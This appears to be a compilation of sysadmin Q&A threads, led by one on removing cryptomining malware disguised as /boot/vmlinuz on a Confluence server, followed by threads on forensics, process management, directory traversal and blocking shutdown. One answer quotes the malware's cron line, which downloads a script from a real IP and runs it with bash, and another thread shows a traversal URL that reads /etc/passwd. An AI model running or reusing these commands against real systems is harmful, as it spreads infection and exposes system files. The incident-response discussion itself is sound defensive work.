vmlinuz process runs at 100% CPU - linux

I'm running a Jira and a Confluence instance (plus an nginx reverse proxy) on a VPS. Currently I can't start Confluence for some reason, and I think this is a consequence of something else.
I've checked the process list:
The confluence user is running a /boot/vmlinuz process, and it eats the CPU. If I kill -9 this process, it restarts a few seconds later.
After rebooting the VPS:
Confluence and Jira started automatically.
Confluence runs correctly for a few seconds, then something kills the process. The Jira process keeps running.
The /boot/vmlinuz process starts.
I've removed Confluence from the automatic start, but it makes no difference.
So my questions:
What is this /boot/vmlinuz process? I've never seen it before. (Yes, I know vmlinuz is the kernel.)
Why does it start over and over again and run at 100% CPU?
What should I do to restore normal behavior so I can start Confluence again?
Thanks for any answers.
UPDATE
It was caused by a hack. If you find a /tmp/seasame file, your server is infected. The malware uses cron to re-download this file. I removed the files in /tmp, killed all the processes, disabled cron for the confluence user, and updated Confluence.

Your server looks like it has been hacked.
Please take a close look at the process list.
E.g. run ps auxc and check where each process binary comes from.
You can use tools like rkhunter to scan your server, but in general you should start by killing everything that has been launched as the confluence user, scanning your server/account, upgrading your Confluence (in most cases an unpatched Confluence is the source of the attack), and looking in your Confluence for additional accounts etc.
If you would like to see what is inside that process, take a look at /proc, e.g. ls -la /proc/996. You will see the source binary there too. You can also launch strace -ff -p 996 to see what the process is doing, or cat /proc/996/exe | strings to see what strings that binary contains. This is probably part of a botnet, a miner, etc.
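As a sketch of those inspection steps (PID 996 is the example from above; the commands below use the current shell's own PID so they run as-is, so substitute the suspect PID):

```shell
# Inspect a suspicious process through /proc. Replace pid with the suspect
# PID (e.g. 996); the current shell's PID is used here so the demo runs as-is.
pid=$$
ls -l "/proc/$pid/exe"                    # symlink to the binary actually executing
tr '\0' ' ' < "/proc/$pid/cmdline"; echo  # full command line (NUL-separated)
# strings "/proc/$pid/exe" | less         # printable strings inside the binary
# strace -ff -p "$pid"                    # attach and watch syscalls (needs root)
```

For malware, /proc/PID/exe often points at a deleted file in /tmp, which is itself a strong indicator.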

I had the same problem; my server was hacked. The virus script was in /tmp. Find the script name from the top command (mine was a meaningless name, "fcbk6hj") and kill the processes (there may be three of them):
root 3158 1 0 15:18 ? 00:00:01 ./fcbk6hj ./jd8CKgl
root 3159 1 0 15:18 ? 00:00:01 ./fcbk6hj ./5CDocHl
root 3160 1 0 15:18 ? 00:00:11 ./fcbk6hj ./prot
Kill all of them, delete /tmp/prot, and kill the /boot/vmlinuz process; CPU usage returns to normal.
I found that the virus re-downloaded the script to /tmp automatically; my workaround was to rename wgetak (mv it to another name).
Virus behaviour:
wgetak -q http://51.38.133.232:80/86su.jpg -O ./KC5GkAo
I found the following task written in the crontab; just delete it:
*/5 * * * * /usr/bin/wgetak -q -O /tmp/seasame http://51.38.133.232:80 && bash /tmp/seasame
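A hedged cleanup sketch for that crontab entry: keep a copy as evidence, strip the downloader line, and re-install the rest (the seasame/IP indicators are the ones from this incident; adjust the pattern for variants):

```shell
# Real cleanup: dump with `crontab -u confluence -l > /tmp/cron.bak` (as root).
# A here-doc stands in here so the sketch runs as-is.
cat > /tmp/cron.bak <<'EOF'
MAILTO=""
*/5 * * * * /usr/bin/wgetak -q -O /tmp/seasame http://51.38.133.232:80 && bash /tmp/seasame
EOF
# Keep the copy as evidence, strip the downloader entry, keep everything else:
grep -vE 'seasame|51\.38\.133\.232' /tmp/cron.bak > /tmp/cron.clean
cat /tmp/cron.clean    # review, then: crontab -u confluence /tmp/cron.clean
```

Wiping the whole crontab with crontab -u confluence -r is also fine if the user had no legitimate entries.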

After removing this from the system and the crontab, it may be a good idea (at least for now) to add the confluence user to /etc/cron.deny.
Afterwards:
$ crontab -e
You (confluence) are not allowed to use this program (crontab)
See crontab(1) for more information

I ran into the same issue at the same time; maybe it is a Confluence bug. I just killed the Confluence process, and then it was all right.

As you found out, this is malware — actually cryptojacking malware, intended to use your CPU as a cryptocurrency miner.
Your server has very likely been compromised because of a Confluence vulnerability (see the first answer of this reddit post); however, one should know that this is NOT ITS ONLY WAY OF PROPAGATION, and this can't be emphasized enough. As a matter of fact, a server of mine has been compromised as well although it doesn't run Confluence (I don't even know this software…), and the so-called /boot/vmlinuz process was run by root.
Also, beware that this malware tries to propagate through SSH using known_hosts and SSH keys, so you should check other computers you accessed from this server.
Finally, the reddit post links to this comprehensive description of this malware, which is worth a read.
NB: Don't forget to send a report to the abuse email address of the IP's ISP.

Related

I observed a Java process running at root level through top command on my application server, will it lead to performance problems?

We were running a load test and simultaneously executed the top command, and observed that a Java process (running at root level) was consuming 204% CPU, even though we ran just 10% of the expected load on the server.
Also, one of my colleagues said that a Java process should not be run at root level, as this leads to performance issues.
I tried searching the internet but could not find anything which says that a Java process should not run at root level.
Note for experts: please excuse my lack of knowledge, and please do not downvote or block the question.
Screen shot of top command:
That's incorrect -- running a process as root will not affect performance, but it will likely affect security.
The reason everyone says not to run your processes as root unless ABSOLUTELY NECESSARY is that the root user has privileges over the entire disk and many other things: external devices, hardware, processes, etc.
Running code that interacts with the world as root means that if anyone finds a vulnerability in your code / project / process / whatever, the amount of damage that can be done is likely WAY MORE than what would be possible as a non-root user.
Try running the below command to find all the processes in Tree Structure.
ps -e -o pid,args --forest
From the output, you will be able to figure out whose children those Java (or other) processes running at root level are. For example, sometimes while testing scripts we trigger them with sudo, which in turn starts the Java instance as root.

Forensic analysis - process log

I am performing Forensic analysis on Host based evidence - examining partitions of a hard drive of a server.
I am interested in finding the processes all the "users" ran before the system died/rebooted.
As this isn't live analysis I can't use ps or top to see the running processes.
So, I was wondering if there is a log like /var/log/messages that shows me what processes users ran.
I have gone through a lot of logs in /var/log/* - they give me information about logins, package updates, authorization - but nothing about the processes.
If no "command accounting" was enabled, there is no such log.
The chances of finding something are not great; anyway, a few things to consider:
it depends on how graceful the death/reboot was (if processes were killed gracefully, .bash_history and similar files may have been updated with recent session info)
utmp and wtmp files may give the list of users active at the reboot.
the OS may save a crash dump (depending on the Linux distribution). If so, you may be able to examine the OS state at the moment of the crash. See Red Hat's crash whitepaper for details (http://people.redhat.com/anderson/crash_whitepaper/).
/tmp and /var/tmp may hold some clues about what was running
any files with mtime and ctime timestamps (and maybe atime) near the time of the crash
you may be able to get something useful from the swap partition (especially if the reboot was related to heavy RAM usage).
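A sketch of the timestamp idea above, assuming the evidence partition is mounted at a hypothetical /mnt/evidence; a throwaway directory with one file stands in below so the commands run as-is:

```shell
# Rank files by modification time to spot activity near the crash.
# EV would be the evidence mount point (e.g. /mnt/evidence, mounted read-only);
# a temporary directory stands in here so the sketch is runnable.
EV=$(mktemp -d)
touch "$EV/suspicious.sh"
find "$EV" -xdev -type f -printf '%T+ %p\n' | sort | tail -n 20
# Narrow to a window, e.g. files modified within 2 days of the crash:
find "$EV" -xdev -type f -mtime -2 -ls
```

The -xdev flag keeps find on the evidence filesystem so it doesn't wander onto the analysis machine's own mounts.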
So, I was wondering if there is a log like /var/log/messages that shows me what processes users ran
Given the OS implied by the /var/log path, I assume you are on Ubuntu or some other Linux server. If you were not doing live forensics while the box was running, or memory forensics (where a memory capture was grabbed), and you rebooted the system, then there is no file within /var/log that will attribute processes to users. However, if a user was using the bash shell, you can check their .bash_history file, which shows the commands that user ran; by default bash keeps the last 500.
Alternatively, if a memory dump was made (/dev/mem or /dev/kmem), you could use Volatility to pull out the processes that were run on the box. Even then, I do not think you could attribute the processes to the users who ran them; you would need additional Volatility output for that link to be made.

Script killing too long process

I'm a webhosting owner. I don't know why, but currently some PHP scripts (from personally known customers) have been running for many hours, so I think there is a bug somewhere.
These scripts are eating the RAM AND the swap... So I'm looking for a way to list the processes, find their execution time, and kill them one by one if the execution exceeds 10 or 20 minutes.
I'm not a bash master, but I know bash and pipes. The only thing I don't know is how to list the processes (with execution time AND the complete command line with arguments). Even in top (then pressing c), no arguments are shown for php :/
Thanks for your help.
If you are running Apache with mod_php, you will not see a separate PHP process since the script is actually running inside an Apache process. If you are running as FastCGI, you also might not see a distinguishable PHP process for the actual script execution, though I have no experience with PHP/FastCGI and might be wrong on this.
You can set the max_execution_time option, but it is overridable at run time by calling set_time_limit() unless you run in Safe Mode. Safe mode, however, has been deprecated in PHP 5.3 and removed in 5.4, so you cannot rely on it if you are on 5.4 or plan to upgrade.
If you can manage it with your existing customers (since in some cases it requires non-trivial changes to PHP code), running PHP as CGI should allow you to monitor the actual script execution, as each CGI request will spawn a separate PHP interpreter process and you should be able to distinguish between the scripts they are executing. Note, however, that CGI is the least efficient setup (the others being mod_php and FastCGI).
You can use the ps aux command to list the processes with detailed information.
You can also check out the ps man page.
This might also be of some help.

Using directory traversal attack to execute commands

Is there a way to execute commands using directory traversal attacks?
For instance, I access a server's etc/passwd file like this
http://server.com/..%01/..%01/..%01//etc/passwd
Is there a way to run a command instead? Like...
http://server.com/..%01/..%01/..%01//ls
..... and get an output?
To be clear: I've found this vuln on our own company's server. I'm looking to raise the risk level (or bonus points for me) by proving that it may give an attacker complete access to the system.
Chroot on Linux is easily breakable (unlike FreeBSD's jail). A better solution is to turn on SELinux and run Apache in an SELinux sandbox:
run_init /etc/init.d/httpd restart
Make sure you have mod_security installed and properly configured.
If you are able to view /etc/passwd because the document root or Directory access is not correctly configured on the server, then the presence of this vulnerability does not automatically mean you can execute commands of your choice.
On the other hand, if you are able to view entries from /etc/passwd because the web application passes user input (a filename) to calls such as popen, exec, system, shell_exec, or variants without adequate sanitization, then you may be able to execute arbitrary commands.
Unless the web server is utterly hideously programmed by someone with no idea what they're doing, trying to access ls using that (assuming it even works) would result in you seeing the contents of the ls binary, and nothing else.
Which is probably not very useful.
Yes, it is possible (the first question) if the application is really, really bad (in terms of security).
http://www.owasp.org/index.php/Top_10_2007-Malicious_File_Execution
Edit #2: I have edited out my comments as they were deemed sarcastic and blunt. Now that more information has come from gAMBOOKa about this (Apache with Fedora, which you should have put into the question), I would suggest:
Post to the Apache forum, highlighting that you're running the latest version of Apache on Fedora, and submit the exploit to them.
Post to Fedora's forum, again highlighting that you're running the latest version of Apache, and submit the exploit to them.
Note: include your httpd.conf when posting to both forums.
To minimize access to passwd files, look into running Apache in a sandboxed/chrooted environment where files such as passwd are not visible from inside the sandbox. If you have a spare box lying around to experiment with, or better, use VMware to simulate the environment you are using for Apache/Fedora (try to make it IDENTICAL), run the httpd server within the VM and access the virtual machine remotely to check whether the exploit is still present. Then chroot/sandbox it and re-run the exploit again...
Document the steps to reproduce it and include a recommendation until a fix is found; meanwhile, if there is minimal impact to running the webserver in a sandboxed/chrooted environment, push them to do so...
Hope this helps,
Best regards,
Tom.
If you can already view /etc/passwd then the server must be poorly configured...
If you really want to execute commands, then you need to know whether the PHP script running on the server contains any system() call, so that you can pass commands through the URL,
e.g.: url?command=ls
Try to view the .htaccess files... that may do the trick.

Temporarily prevent linux from shutting down

I have a backup script that runs in the background daily on my Linux (Fedora 9) computer. If the computer is shut down while the backup is in progress, the backup may be damaged, so I would like to write a small script that temporarily disables the ability of the user to reboot or shut the computer down.
It is not necessary that the script be uncircumventable; it's just to let the users of the system know that a backup is in progress and that they shouldn't shut down. I've seen the Inhibit method in the D-Bus freedesktop power management spec:
http://people.freedesktop.org/~hughsient/temp/power-management-spec-0.3.html
but that only prevents shutdowns while the system is idle, not shutdowns explicitly requested by the user.
Is there an easy way to do this in C/Python/Perl or bash?
Update: To clarify the question above: it's a machine with multiple users, but they use it sequentially via the plugged-in keyboard/mouse. I'm not looking for a system that would stop me "hacking" around it as root, but for a script that would remind me (or another user) that the backup is still running when I choose shut down from the GNOME/GDM menus.
Another get-you-started solution: during shutdown, the system runs the scripts in /etc/init.d/ (or really, the scripts in /etc/rc.*/, but you get the idea). You could create a script in that directory that checks the status of your backup and delays shutdown until the backup completes. Or better yet, one that gracefully interrupts your backup.
The super-user could work around this script (with /sbin/halt, for example), but you cannot prevent the super-user from doing anything if their mind is really set on it.
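A get-you-started sketch of such an init.d check (backupprocess is a placeholder for the real backup command's name):

```shell
#!/bin/sh
# Delay shutdown until the backup finishes. 'backupprocess' is a placeholder
# for the actual backup command's name; poll every 10 seconds until it exits.
while pgrep -x backupprocess > /dev/null; do
    echo "Backup still running; delaying shutdown..."
    sleep 10
done
echo "Backup finished; shutdown may proceed."
```

Installed as a K-script in the appropriate runlevel, this blocks the rest of the shutdown sequence until the backup process disappears from the process table.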
There is molly-guard to prevent accidental shutdowns, reboots, etc. until all required conditions are met; the conditions can be self-defined.
As already suggested, you can also perform backup operations as part of the shutdown process. See for example this page.
If users are going to be shutting down via GNOME/KDE, just inhibit them from doing so.
http://live.gnome.org/GnomePowerManager/FAQ#head-1cf52551bcec3107d7bae8c332fd292ec2261760
I can't help but feel that you're not grokking the Unix metaphor, and that what you're asking for is a kludge.
If a user is running as root, there's nothing you can do to stop root from shutting down the system. You can do window dressing like obscuring the shutdown UI, but that doesn't really accomplish anything.
I can't tell whether you're talking about a multi-user machine or a machine used as a "desktop PC" with a single user sitting at the console. If it's the former, your users really shouldn't be accessing the machine with credentials that can shut down the system for day-to-day activities. If it's the latter, I'd recommend educating the users to either (a) check that the script is running, or (b) use a designated shutdown script that checks for the script's process and refuses to shut down until it's gone.
More a get-you-started than a complete solution: you could alias the shutdown command away, and then use a script like
#!/bin/sh
# Refuse to shut down while the backup process is still running.
if pgrep -f backupprocess > /dev/null; then
    echo "Backup in progress: aborted shutdown"
    exit 0
else
    echo "Backup not in progress: shutting down"
    shutdown-alias -h now
fi
saved in the user's path as shutdown. I expect there would be some variation depending on how your users invoke shutdown (window manager icons / command line), and perhaps between distros too.
But a script that would remind me (or another user) that the backup is still running when I choose shut down from the Gnome/GDM menus
One may use polkit to completely block shutdown/restart, but I failed to find a method that would give the user a clear response about why it is blocked.
Adding the following lines as /etc/polkit-1/localauthority/50-local.d/restrict-login-powermgmt.pkla works:
[Disable lightdm PowerMgmt]
Identity=unix-user:*
Action=org.freedesktop.login1.reboot;org.freedesktop.login1.reboot-multiple-sessions;org.freedesktop.login1.power-off;org.freedesktop.login1.power-off-multiple-sessions;org.freedesktop.login1.suspend;org.freedesktop.login1.suspend-multiple-sessions;org.freedesktop.login1.hibernate;org.freedesktop.login1.hibernate-multiple-sessions
ResultAny=no
ResultInactive=no
ResultActive=no
You still see a confirmation dialog, but there are no buttons to confirm. It looks ugly, but it works ;)
Unfortunately this applies to all users, not only the lightdm session, so you have to add a second rule to white-list them if desired.
Note that this method blocks solely reboot/shutdown commands issued from the GUI. To block such commands from the command line, one may use molly-guard, as explained in https://askubuntu.com/questions/17187/disabling-shutdown-command-for-all-users-even-root-consequences/17255#17255
